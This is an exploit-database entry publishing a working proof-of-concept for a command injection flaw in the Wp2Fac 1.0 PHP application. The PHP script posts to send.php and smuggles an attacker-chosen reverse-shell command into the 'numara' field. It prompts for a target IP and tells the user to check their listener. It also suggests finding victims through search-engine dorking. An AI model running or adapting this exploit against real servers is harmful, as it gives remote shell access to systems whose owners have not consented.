Share
## https://sploitus.com/exploit?id=PACKETSTORM:189698
=============================================================================================================================================
| # Title : Wp2Fac 1.0 PHP COde Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/metinyesil/wp2fac |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: Send a POST request using PHP to execute commands on the target server.
(Related : https://packetstorm.news/files/id/174555/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php script.php
[+] PayLoad :
<?php
function send_post_request($host, $revshell) {
$url = "http://$host/send.php";
$headers = [
"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept: */*",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate",
"Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With: XMLHttpRequest",
"Origin: http://$host",
"Connection: close",
"Referer: http://$host/"
];
$data = [
"numara" => "1234567890 & $revshell &;"
];
$options = [
"http" => [
"header" => implode("\r\n", $headers),
"method" => "POST",
"content" => http_build_query($data)
]
];
$context = stream_context_create($options);
$response = file_get_contents($url, false, $context);
return $response;
}
$host = readline("Target IP: ");
$revshell = readline("Reverse Shell Command: ");
echo "Check your listener!\n";
echo send_post_request($host, $revshell);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================